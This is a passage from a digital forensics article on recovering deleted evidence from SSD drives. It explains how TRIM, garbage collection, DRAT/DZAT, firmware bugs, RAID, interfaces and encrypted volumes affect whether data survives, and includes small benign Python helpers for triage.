So far, the only practical way of obtaining evidence from an SSD drive remains traditional imaging (with a dedicated hardware/software combination), followed by analysis with an evidence discovery tool (such as Belkasoft Evidence Center, http://forensic.belkasoft.com/en/bec/en/evidence_center.asp). We now know more about the expected outcome when analyzing an SSD drive.
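On Linux, the hdparm -I check quoted earlier can be turned into a small classifier for the three TRIM types just described (a sketch; the string matching assumes hdparm's usual English wording and may need adjusting for other versions):

```python
def classify_trim(hdparm_output: str) -> str:
    """Map `hdparm -I /dev/sdX` output to one of the three TRIM types."""
    text = hdparm_output.lower()
    if "trim supported" not in text:
        return "no TRIM"
    # hdparm prints "Deterministic read ZEROs after TRIM" for DZAT drives
    if ("deterministic read zeros after trim" in text
            or "deterministic read zeroes after trim" in text):
        return "DZAT"
    if "deterministic read data after trim" in text:
        return "DRAT"
    return "non-deterministic TRIM"

sample = """\
   *    Data Set Management TRIM supported (limit 1 block)
   *    Deterministic read data after TRIM
"""
print(classify_trim(sample))  # DRAT
```

A DZAT drive is the least promising target for carving; a non-deterministic one is the most promising.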
There are generally two scenarios: either the SSD only contains existing data (files and folders, traces of deleted data in MFT attributes, unallocated space carrying no information), or the SSD contains the full information (destroyed evidence still available in unallocated disk space). Today, we can predict which scenario is going to happen by investigating the conditions in which the SSD drive has been used.

Scenario 1: Existing Files Only

In this scenario, the SSD may contain some files and folders, but free disk space will be truly empty (as in "filled with zero data"). As a result, carving free disk space will return no information or only traces of information, while carving the entire disk space will only return data contained in existing files.

So, is file carving useless on SSD drives? No way! Carving is the only practical way of locating moved or hidden evidence (e.g. renamed history files, or documents stored in the Windows\System32 folder and renamed to .SYS or .DLL). Practically speaking, the same acquisition and analysis methods should be applied to an SSD drive as if we were analyzing a traditional magnetic disk. Granted, we'll recover little or no destroyed evidence, but any evidence contained in existing files, including, e.g., deleted records from SQLite databases (used, for example, in Skype histories), can still be recovered (http://forensic.belkasoft.com/en/recover-destroyed-sqlite-evidence-skype-and-iphone-logs).

Scenario 2: Full Disk Content

In the second scenario, the SSD disk will still contain the complete set of information, just like a traditional magnetic disk. Obviously, all the usual techniques should be applied at the analysis stage, including file carving.

Why would an SSD drive NOT destroy evidence as a result of routine garbage collection? Garbage collection does not erase the content of released data blocks if the TRIM command has not been issued, or if any link in the chain does not support the TRIM protocol.
Let's see in which cases this could happen.

More than 1000 items were carved out of the unallocated sectors of an SSD drive, in particular Internet Explorer history, Skype conversations, SQLite databases, system files and other forensically important types of data.

Operating System Support

TRIM is a property of the operating system as much as it is a property of the SSD device. Older operating systems do not support TRIM. Wikipedia (http://en.wikipedia.org/wiki/Trim_(computing)) has a comprehensive table detailing operating system support for the TRIM command.

[TABLE]
[TR]
[TD]Operating System[/TD]
[TD]Supported since[/TD]
[TD]Notes[/TD]
[/TR]
[TR]
[TD]DragonFly BSD[/TD]
[TD]May 2011[/TD]
[TD][/TD]
[/TR]
[TR]
[TD]FreeBSD[/TD]
[TD]8.1 – July 2010[/TD]
[TD]Support was added at the block device layer in 8.1. File system support was added in FreeBSD 8.3 and FreeBSD 9, beginning with UFS. ZFS trimming support was added in FreeBSD 9.2. FreeBSD 10 will support trimming on software RAID configurations.[/TD]
[/TR]
[TR]
[TD]Linux[/TD]
[TD]2.6.28 – 25 December 2008[/TD]
[TD]Initial support for discard operations was added for FTL NAND flash devices in 2.6.28. Support for the ATA TRIM command was added in 2.6.33. Not all file systems make use of TRIM. Among the file systems that can issue TRIM requests automatically are Ext4, Btrfs, FAT, GFS2 and XFS. However, this is disabled by default due to performance concerns, but it can be enabled by setting the "discard" mount option. Ext3, NILFS2 and OCFS2 offer ioctls to perform offline trimming.
The TRIM specification calls for supporting a list of trim ranges, but as of kernel 3.0, trim is only invoked with a single range, which is slower.[/TD]
[/TR]
[TR]
[TD]Mac OS X[/TD]
[TD]10.6.8 – 23 June 2011[/TD]
[TD]Although the AHCI block device driver gained the ability to display whether a device supports the TRIM operation in 10.6.6 (10J3210), the functionality itself remained inaccessible until 10.6.8, when the TRIM operation was exposed via the IOStorageFamily and file system (HFS+) support was added. Some online forums state that Mac OS X only supports TRIM for Apple-branded SSDs; third-party utilities are available to enable it for other brands.[/TD]
[/TR]
[TR]
[TD]Microsoft Windows[/TD]
[TD]NT 6.1 (Windows 7 and Windows Server 2008 R2) – October 2009[/TD]
[TD]Windows 7 only supports TRIM for ordinary (SATA) drives and does not support this command for PCI Express SSDs, which are a different type of device, even if the device itself would accept the command. It is confirmed that with native Microsoft drivers the TRIM command works in AHCI and legacy IDE/ATA mode.[/TD]
[/TR]
[TR]
[TD]OpenSolaris[/TD]
[TD]July 2010[/TD]
[TD][/TD]
[/TR]
[TR]
[TD]Android[/TD]
[TD]4.3 – 24 July 2013[/TD]
[TD][/TD]
[/TR]
[/TABLE]

Old Versions of Windows

As shown in the table above, TRIM support was only added in Windows 7; obviously, TRIM is also supported in Windows 8 and 8.1. In Windows Vista and earlier, the TRIM protocol is not supported, and the TRIM command is not issued. As a result, when analyzing an SSD drive obtained from a system running one of the older versions of Windows, it is possible to obtain the full content of the device. Possible exception: TRIM-like behavior can be enabled via certain third-party solutions (e.g. Intel SSD Optimizer, a part of Intel SSD Toolbox).

Mac OS X

Mac OS X has supported the TRIM command for Apple-supplied SSD drives since version 10.6.8. Older builds of Mac OS X do not support TRIM.
Notably, user-installed SSD drives not supplied by Apple itself are excluded from TRIM support.

Old or Basic SSD Hardware

Not all SSD drives support TRIM and/or background garbage collection. Older SSD drives, as well as the SSD-like flash media used in basic tablets and sub-notes (such as certain models of the ASUS Eee), do not support the TRIM command. For example, Intel started manufacturing TRIM-enabled SSD drives with a lithography of 34 nm (G2); their 50 nm SSDs do not have TRIM support. In reality, few SSD drives without TRIM have survived that long. Many entry-level sub-notebooks use flash-based storage often mislabeled as "SSD" that neither features garbage collection nor supports the TRIM protocol.

(Windows) File Systems Other than NTFS

TRIM is a feature of the file system as much as a property of the SSD drive. At this time, Windows only supports TRIM on NTFS-formatted partitions. Volumes formatted with FAT, FAT32 and exFAT are excluded. Notably, some (older) SSD drives used trickery to work around the lack of TRIM support by trying to interpret the file system, attempting to erase dirty blocks not referenced from the file system. This approach, when enabled, only works for the FAT file system, since it is a published spec. (http://www.snia.org/sites/default/files2/sdc_archives/2009_presentations/thursday/NealChristiansen_ATA_TrimDeleteNotification_Windows7.pdf)

External Drives, USB Enclosures and NAS

The TRIM command is fully supported over the SATA interface, including the eSATA extension, as well as over SCSI via the UNMAP command. If an SSD drive is used in a USB enclosure or installed in most models of NAS devices, the TRIM command will not be communicated over the unsupported interface. There is a notable exception.
Some NAS manufacturers are starting to recognize the demand for units with the ultra-high performance, low power consumption and noise-free operation provided by SSD drives, and are slowly adopting TRIM in some of their models. At the time of this writing, of all manufacturers only Synology appears to support TRIM, in a few select models of NAS devices and SSD drives. Here is a quote from the Synology Web site (https://www.synology.com/en-uk/support/faq/591):

SSD TRIM improves the read and write performance of volumes created on SSDs, increasing efficiency as well as extending the lifetime of your SSDs. See the list below for verified SSDs with TRIM support.
· You may customize a schedule to choose when the system will perform TRIM.
· SSD TRIM is not available when an SHA cluster exists.
· TRIM cannot be enabled on iSCSI LUN.
· The TRIM feature under RAID 5 and 6 configurations can only be enabled on SSDs with DZAT (Deterministic Read Zero after TRIM) support. Please contact your SSD manufacturer for details on DZAT support.

PCI Express (PCIe) SSDs

Interestingly, the TRIM command is not natively supported by any version of Windows for the many high-performance SSD drives occupying a PCI Express slot. Do not confuse PCI Express SSDs with SATA drives carrying M.2 or mSATA interfaces. Possible exception: TRIM-like behavior can be enabled via certain third-party solutions (e.g. Intel SSD Optimizer, a part of Intel SSD Toolbox).

RAID

The TRIM command is not yet supported in RAID configurations (with a few rare exceptions), so SSD drives working as part of a RAID array can be analyzed. A notable exception to this rule is a modern RAID 0 setup using a compatible chipset (such as Intel H67, Z77, Z87, H87 or Z68) accompanied by the correct drivers (the latest RST driver from Intel allegedly works) and a recent version of the BIOS. In these configurations, TRIM can be enabled.
Corrupted Data

Surprisingly, SSD drives with corrupted system areas (damaged partition tables, skewed file systems, etc.) are easier to recover than healthy ones. The TRIM command is not issued over corrupted areas because files are not properly deleted; they simply become invisible or inaccessible to the operating system. Many commercially available data recovery tools (e.g. Intel® Solid-State Drive Toolbox with Intel® SSD Optimizer, OCZ SSD Toolbox) can reliably extract information from logically corrupted SSD drives.

Bugs in SSD Firmware

The firmware used in SSD drives may contain bugs, often affecting the TRIM functionality and/or messing up garbage collection. To give an example, the OCZ Agility 3 120 GB shipped with buggy firmware v2.09, in which TRIM did not work. Firmware v2.15 fixed TRIM behavior, while v2.22 introduced issues with data loss on wake-up after sleep; firmware v2.25 then fixed that but disrupted TRIM operation again (information taken from http://www.overclock.net/t/1330730/ocz-firmware-2-25-trim-doesnt-work-bug-regression-bad-ocz-experience). A particular SSD drive may or may not be recoverable depending on which bugs were present in its firmware.

Bugs in SSD Over-Provisioning

SSD over-provisioning is one of the many wear-leveling mechanisms intended to increase SSD life span. Some areas on the disk are reserved at the controller level, meaning that a 120 GB SSD drive carries more than 120 GB of physical memory. These extra data blocks are called the over-provisioning (OP) area, and can be used by the SSD controller when a fresh block is required for a write operation. A dirty block then enters the OP pool, and is erased by the garbage collection mechanism during the drive's idle time. Speaking of SSD over-provisioning, firmware bugs can affect TRIM behavior in other ways, for example by revealing trimmed data after a reboot or power-off.
Solid-state drives constantly remap after TRIM, allocating addresses out of the OP pool. As a result, the SSD reports a trimmed data block as writeable (already erased) immediately after TRIM. Obviously, the drive has not had the time to actually clean the old data from that block; instead, it simply maps a physical block from the OP pool to the address referred to by the trimmed logical block. What happens to the data stored in the old block? For a while, it contains the original data (in many cases compressed, depending on the SSD controller). However, as that data block is mapped out of the addressable logical space, the original data is no longer accessible or addressable.

Sounds complex? You bet. That's why even seasoned SSD manufacturers may not get it right on the first try. Issues like this can cause problems when, after deleting data and rebooting the PC, some users see the old data back as if it was never deleted: because of the mapping issue, the new pointers would not work as they should, due to a bug in the drive's firmware. OCZ released a firmware fix to correct this behavior, but similar (or other) bugs may still affect other drives.

SSD Shadiness: Manufacturers' Bait-and-Switch

When choosing an SSD drive, customers tend to read online reviews. Normally, when a new drive gets released, it is reviewed by various sources soon after it becomes available. The reviews get published, and customers often base their choice on them. But what if a manufacturer silently changes the drive's specs without changing the model number? In that case, an SSD drive that used to have great reviews suddenly becomes much less attractive. This is exactly what happened with some manufacturers.
According to ExtremeTech (http://www.extremetech.com/extreme/184253-ssd-shadiness-kingston-and-pny-caught-bait-and-switching-cheaper-components-after-good-reviews), two well-known SSD manufacturers, Kingston and PNY, were caught bait-and-switching cheaper components after getting good reviews. The two manufacturers launched their SSDs with one hardware specification, then quietly changed the hardware configuration after the reviews had gone out.

So what's in it for us? Well, the forensic-friendly SandForce controller was found in the second revision of PNY Optima drives. Instead of the original Silicon Motion controller, the new batch of PNY Optima drives had a SandForce-based controller known for its less-than-perfect implementation of garbage collection, leaving data on the disk for a long time after it has been deleted.

Small Files: Slack Space

Remnants of deleted evidence can be acquired from so-called slack space as well as from MFT attributes. In the world of SSDs, the term "slack space" takes on a new meaning. Rather than being a matter of file and cluster size alignment, "slack space" on SSD drives is about the different sizes of the minimum writeable and minimum erasable blocks on the physical level. Micron, a manufacturer of NAND chips used in many SSD drives, published a comprehensive article on SSD structure: https://www.micron.com/~/media/Documents/Products/Technical%20Marketing%20Brief/ssd_effect_data_placement_writes_tech_brief.pdf

In SSD terms, a page is the smallest unit of storage that can be written to. The typical page size of today's SSDs is 4 KB or 8 KB. A block, on the other hand, is the smallest unit of storage that can be erased. Depending on the design of a particular SSD drive, a single block may contain 128 to 256 pages.
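A quick back-of-the-envelope check of the erase-block sizes these figures imply (page sizes and per-block page counts taken from the paragraph above; real geometries vary by drive):

```python
PAGE_SIZES = (4 * 1024, 8 * 1024)   # typical writable page: 4 KB or 8 KB
PAGES_PER_BLOCK = (128, 256)        # pages per erasable block

# Smallest and largest erase-block sizes implied by the figures above
sizes = sorted(p * n for p in PAGE_SIZES for n in PAGES_PER_BLOCK)
print("min erase block:", sizes[0] // 1024, "KB")        # 128 x 4 KB = 512 KB
print("max erase block:", sizes[-1] // 1024 ** 2, "MB")  # 256 x 8 KB = 2 MB

def block_keeps_remnants(deleted_bytes: int, block_size: int) -> bool:
    """A deleted file smaller than one erase block cannot dirty a whole
    block by itself, so the block (and any remnants in it) may survive
    garbage collection for a while."""
    return deleted_bytes < block_size

print(block_keeps_remnants(300 * 1024, 512 * 1024))  # True
```

This is where the 512 KB and 2 MB thresholds discussed next come from.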
As a result, if a file is deleted and its size is less than the size of a single SSD data block, OR if a particular SSD data block contains pages that still remain allocated, that particular block is NOT erased by the garbage collection algorithm. In practical terms, this means that files or file fragments (chunks) smaller than 512 KB or 2 MB, depending on the SSD model, may not be affected by the TRIM command, and may still be forensically recoverable.

However, the implementation of the Deterministic Read After Trim (DRAT) protocol by many recent SSD drives makes trimmed pages inaccessible via standard SATA commands. If a particular SSD drive implements DRAT or DZAT (Deterministic Read Zero After Trim), the actual data may physically reside on the drive for a long time, yet it will be unavailable to forensic specialists via standard acquisition techniques. Sending the SSD drive to the manufacturer might be the only way of obtaining this information on a physical level.

Small Files: MFT Attributes

Most hard drives used in Windows systems use NTFS as their file system. NTFS stores information about files and directories in the Master File Table (MFT), which contains at least one record for every file and directory in the file system. In terms of computer forensics, one particular feature of the MFT is of great interest: unique to NTFS is the ability to store small files directly in the file system. The entire content of a small file can be stored as an attribute inside an MFT record, greatly improving read performance and decreasing wasted disk space (the "slack" space referenced in the previous chapter). As a result, small files that are deleted are not going anywhere: their entire content continues to reside in the file system. The MFT records are not emptied, and are not affected by the TRIM command.
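As an illustration of how small such resident files are, here is a trivial filter for files small enough to live inside an MFT record. The 982-byte ceiling is the figure quoted in this article; the exact limit depends on the MFT record size and the other attributes stored in the record:

```python
# Ceiling for NTFS resident-file payloads as quoted in this article;
# the exact limit varies with MFT record size and attribute overhead.
RESIDENT_CEILING = 982  # bytes

def resident_candidates(files):
    """Yield (name, size) pairs small enough to live inside an MFT record,
    i.e. files whose content may survive deletion untouched by TRIM."""
    for name, size in files:
        if size <= RESIDENT_CEILING:
            yield name, size

listing = [("desktop.ini", 282), ("note.txt", 900), ("report.docx", 48500)]
print(list(resident_candidates(listing)))
# [('desktop.ini', 282), ('note.txt', 900)]
```

A filter like this helps decide which deleted files are worth looking for in a file system carve rather than in unallocated space.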
This in turn allows investigators to recover such resident files by carving the file system. How small does a file have to be to fit inside an MFT record? Very small: the maximum size of a resident file cannot exceed 982 bytes. Obviously, this severely limits the value of resident files for the purpose of digital forensics.

Encrypted Volumes

Somewhat counter-intuitively, information deleted from certain types of encrypted volumes (some configurations of BitLocker, TrueCrypt, PGP and other containers) may be easier to recover, as it may not be affected by the TRIM command. Files deleted from such encrypted volumes stored on an SSD drive can be recovered (unless they were specifically wiped by the user) if the investigator knows either the original password or the binary decryption keys for the volume.

TRIM on encrypted volumes is a huge topic, well worth a dedicated article or even a series of articles. With the large number of crypto containers floating around, and all the different security considerations and available configuration options, determining whether TRIM was enabled on a particular encrypted volume is less than straightforward. Let's try assembling a brief summary of some of the most popular encryption options.

Apple FileVault 2

Introduced with Apple OS X "Lion", FileVault 2 enables whole-disk encryption. More precisely, FileVault 2 enables whole-volume encryption only on HFS+ volumes (Encrypted HFS). Apple chose to enable TRIM with FileVault 2 volumes on SSD drives. This has the expected security implication of free sectors/blocks being revealed.

Microsoft BitLocker

Microsoft has its own built-in volume-level encryption called BitLocker. Microsoft made the same choice as Apple, enabling TRIM on BitLocker volumes located on SSD drives. As usual for Microsoft Windows, the TRIM command is only available on NTFS volumes.
TrueCrypt

TrueCrypt supports TRIM pass-through on encrypted volumes located on SSD drives. The developers issued several security warnings relating to wear-leveling security issues and to the TRIM command revealing information about which blocks are in use and which are not (http://www.truecrypt.org/docs/trim-operation and http://www.truecrypt.org/docs/wear-leveling).

PGP Whole Disk Encryption

By default, PGP whole-disk encryption does not enable TRIM on encrypted volumes. However, considering the wear-leveling issues of SSD drives, Symantec introduced an option to enable TRIM on SSD volumes via a command-line option: –fast (http://www.symantec.com/connect/forums/pgp-and-ssd-wear-leveling). If an encrypted volume of a fixed size is created, the default behavior is also to encrypt the entire content of the file representing the encrypted volume, which disables the effect of the TRIM command for the contents of the encrypted volume.

More research is required to investigate these options. At this time one thing is clear: in many configurations, including default ones, files deleted from encrypted volumes will not be affected by the TRIM command. Which brings us to the question of the correct acquisition of PCs with encrypted volumes.

Forensic Acquisition: The Right Way to Do It

The right way to acquire a PC with a crypto container can be described with the following sentence: "If it's running, don't turn it off. If it's off, don't turn it on." Indeed, the original decryption keys are cached in the computer's memory, and can be extracted from a live RAM dump obtained from a running computer, e.g. by performing a FireWire attack. These keys can also be contained in page files and hibernation files. Tools such as Passware can extract decryption keys from memory dumps and page/hibernation files, decrypting the content of encrypted volumes.

Reality Steps In: Why Real SSDs are Often Recoverable

In reality, things may look different from what was just described above in such great technical detail.
In our lab, we've seen hundreds of SSD drives acquired from a variety of computers. Surprisingly, Belkasoft Evidence Center was able to successfully carve deleted data from the majority of SSD drives taken from inexpensive laptops and sub-notebooks such as the ASUS Eee or ASUS Zenbook. Why is this so? There are several reasons, mainly cost savings and miniaturization, but sometimes it's simply over-engineering.

Inexpensive laptops often use flash-based storage, calling it an SSD as a marketing ploy. In fact, in most cases it's just slow, inexpensive and fairly small flash-based storage having nothing to do with real SSD drives.

Ultrabooks and sub-notes have no space to fit a full-size SSD drive. They used to use SSD drives in a PCIe form factor (as opposed to M.2 or mSATA) which did not support the SATA protocol. Even if these drives are compatible with the TRIM protocol, Windows does not support TRIM on non-ATA devices. As a result, TRIM is not enabled on these drives.

SSD drives are extremely complex devices requiring extremely complex firmware to operate. Many SSD drives were released with buggy firmware effectively disabling the effects of TRIM and garbage collection. If the user has not upgraded their SSD firmware to a working version, the original data may reside on the SSD drive for a long time.

The fairly small (and inexpensive) SSD drives used in many entry-level notebooks lack support for DRAT/DZAT. As a result, deleted (and trimmed) data remains accessible for a long time, and can be successfully carved from a promptly captured disk image.

On the other end of the spectrum are the very high-end, over-engineered devices. For example, Acer advertises its Aspire S7-392 as having a RAID 0 SSD. According to Acer marketing, "RAID 0 solid state drives are up to 2X faster than conventional SSDs. Access your files and transfer photos and movies quicker than ever!" (http://www.acer.com/aspires7/en_US/). This looks like over-engineering.
As TRIM is not enabled on RAID SSDs in any version of Windows, this ultra-fast non-conventional storage system may slow down drastically over time (which is exactly the problem TRIM was invented to solve). For us, this means that any data deleted from such storage systems could remain there for at least as long as it would have remained on a traditional magnetic disk. Of course, the right chipset (such as Intel H67, Z77, Z87, H87 or Z68) combined with the correct drivers (the latest RST driver from Intel allegedly works) can re-enable TRIM. However, we have yet to see how this works in reality (http://www.anandtech.com/show/6477/trim-raid0-ssd-arrays-work-with-intel-6series-motherboards-too).

Conclusion

SSD forensics remains different. SSDs self-destroy court evidence: extracting deleted files is difficult, and recovering destroyed information (e.g., from formatted disks) is close to impossible. Numerous exceptions still exist, however, allowing forensic specialists to access destroyed evidence on SSD drives used in certain configurations.

There has been little progress in SSD development since the publication of our last article on SSD forensics in 2012. The factor defining the playing field remains delivering bigger capacity for less money. That aside, compressing SSD controllers appear to be becoming the norm, making off-chip acquisition impractical and killing all sorts of DIY SSD acquisition hardware.

More SSD drives appear to follow the Deterministic Read After Trim (DRAT) behavior defined in the SATA standard long ago. This in turn means that a quick format is likely to render deleted evidence instantly inaccessible to standard read operations, even if the drive is imaged with forensic write-blocking hardware immediately afterwards.

SSD drives are getting more complex, adding over-provisioning support and using compression for better performance and wear leveling.
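The DRAT behavior described above suggests a quick triage heuristic: on a drive that returns zeros for trimmed LBAs, the share of all-zero sectors in a captured image hints at how much of it has already been trimmed away. A minimal sketch follows; the function name and sector size default are our own choices, and this is a heuristic only, since sparse regions and deliberately wiped areas also read back as zeros.

```python
# Triage heuristic: fraction of all-zero sectors in a raw image.
# A high ratio on a DRAT/DZAT drive suggests trimmed (unrecoverable) space.
def zero_sector_ratio(image: bytes, sector_size: int = 512) -> float:
    """Fraction of full sectors in `image` that contain only zero bytes."""
    n_sectors = len(image) // sector_size
    if n_sectors == 0:
        return 0.0
    empty = bytes(sector_size)
    zero = sum(
        1
        for i in range(n_sectors)
        if image[i * sector_size:(i + 1) * sector_size] == empty
    )
    return zero / n_sectors
```

A ratio near 1.0 over a region that previously held data is consistent with the quick-format scenario described above, where DRAT makes trimmed evidence read as zeros even through a write blocker.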
However, because of this increased complexity, even seasoned manufacturers have released SSD drives with buggy firmware, causing improper operation of the TRIM and garbage collection functionality. Considering just how complex today’s SSD drives have become, it is surprising these things work at all, even occasionally. The playing field is constantly changing, but what we know now about SSD forensics gives hope.

About the authors

Yuri Gubanov is a renowned computer forensics expert. He is a frequent speaker at well-known industry conferences such as HTCIA, TechnoSecurity, CEIC and others. Yuri is the Founder and CEO of Belkasoft and a senior lecturer at St. Petersburg State University. You can add Yuri Gubanov to your LinkedIn network at Yuri Gubanov | LinkedIn.

Oleg Afonin is an expert and consultant in computer forensics.

You can contact the authors via research@belkasoft.com

About Belkasoft Research

Belkasoft Research is based at St. Petersburg State University. The company performs non-commercial research and scientific activities.

Source: Recovering Evidence from SSD Drives in 2014: Understanding TRIM, Garbage Collection and Exclusions | Forensic Focus - Articles